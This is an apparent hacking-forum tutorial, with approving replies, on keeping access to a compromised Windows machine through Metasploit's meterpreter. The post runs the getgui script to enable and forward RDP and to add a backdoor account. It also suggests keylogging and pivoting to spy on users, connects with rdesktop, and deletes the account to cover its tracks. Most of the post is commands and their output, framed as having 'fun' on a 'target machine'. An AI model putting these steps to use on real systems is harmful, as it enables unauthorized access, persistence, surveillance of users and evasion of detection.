[LEGITimacy™]

Hello Hack Community. Im quite bored and decided to make a small tutorial on how to enable a remote desktop connection using metasploit. Its really easy if you get a meterpreter script up. Just a couple of commands and you should have it up and running and ready to have some fun with a nice view of your target machine.

LEGIT'S TUT TO-DO LIST:

[*] Enable RDP with meterpreter's getgui script.
[*] Add new user.
[*] Make sure RDP is forwarded and we can connect to it.
[*] Monitor System Uptime and user activity.
[*] Connect to RDP & have some fun. :yeye:
[*] Once done, wipe everything & clean our tracks.

[+] STEP 1,2,3 IN ONE COMMAND.
[*] OBJECTIVES:
[*] Enable RDP with meterpreter's getgui script.
[*] Add new user.
[*] Make sure RDP is forwarded and we can connect to it.

[+] We are about to use getgui script and add a user -> LEGIT with the password -> pass & make sure our connection is forwarded so we can connect to it remotely from our system.

PHP Code:

meterpreter > run getgui -h
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u  -p 
Or:    getgui -e

OPTIONS:

    -e  Enable RDP only.
    -f   Forward RDP Connection.
    -h  Help menu.
    -l   The language switch
        Possible Options: 'de_DE', 'en_EN' / default is: 'en_EN'
    -p   The Password of the user

meterpreter > run getgui -f -u LEGIT -p pass
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Language detection started
[*]     Language detected: en_US
[*] Setting user account for logon
[*]     Adding User: LEGIT with Password: pass
[*]     Adding User: LEGIT to local group ''
[*]     Adding User: LEGIT to local group ''
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20110112.2448.rc
meterpreter > 


[+] Now thats we have RDP running and setup its time to move to our next objective and monitor system boot time, uptime, user activity, etc..

[+] STEP FOUR
[*] OBJECTIVES:
[*] Monitor System Uptime and user activity.

[+] This task will not be discussed as much because im sure if you can exploit the system you have at least enough knowledge to monitor the system and see when its up or not and whats going on. There are plenty of tools, you can monitor network traffic with wireshark, use the meterpreter's key_scan option and keylog the system or try pivoting through out the network to gain more information on users & the network layout. But I will through in a nice bash script to help with this when you exploit a linux system.

BASH SCRIPT:

PHP Code:

#!/bin/bash
CPUTIME=$(ps -eo pcpu | awk 'NR>1' | awk '{tot=tot+$1} END {print tot}')
CPUCORES=$(cat /proc/cpuinfo | grep -c processor)
echo "
System Summary (collected on `date`)

 - CPU Cores  = `echo $CPUCORES`
 - CPU Usage (average)  = `echo $CPUTIME / $CPUCORES | bc`%
 - Memory free (real)  = `free -m | head -n 2 | tail -n 1 | awk {'print $4'}` Mb
 - Memory free (cache)  = `free -m | head -n 3 | tail -n 1 | awk {'print $3'}` Mb
 - Swap in use  = `free -m | tail -n 1 | awk {'print $3'}` Mb
 - System Uptime  = `uptime`
 - Local IPs  = `ifconfig | grep -B1 "inet addr" | awk '$1 == "inet"{ print $2}'|awk -F: '{print $2}' |grep -v "127.0.0.1"
`
 - Public IP  = `dig +short myip.opendns.com @resolver1.opendns.com`
 - Disk Space Used  = `df -h|awk '$6 ~ /\/$/ {print $1 ": percentage used: " $5 " out of " $2 " total on " $6}'
`
##
" 


[+] STEP 5 & 6
[*] OBJECTIVES:
[*] Connect to RDP & have some fun. :yeye:
[*] Once done, wipe everything & clean our tracks.

[+] I will connect to RDP using linux command, windows users reading this, connecting to a remote RDP is pretty self explanatory so if you cant figure that out, I think you should just hang it up. So we are going to use the rdesktop command to connect.

PHP Code:

LEGIT@HF:-$ rdesktop -u LEGIT -p pass 192.168.1.103 


[+] There you go. You should be connected to your remote desktop connection and viewing your target screen. Now when your done and you want to wipe the user account and your track, you run this. (This is just for my computer, when you run getgui look at the bottom of the output and it should say the command to clean everything up)

PHP Code:

meterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20110112.2448.rc
[*] Running Command List ...
[*]     Running command execute -H -f cmd.exe -a "/c net user LEGIT /delete"
Process 288 created.
meterpreter > 


Well thats the end of this TUT, hope you guys liked it!

[Synchro]

Nice tutorial, very detailed.

[pratham]

really nice tutorial..!! i will try this exploit...

Thank you..!!

[3r3bus]

This is actually pretty interesting. Would love to see more metasploit tutorials around.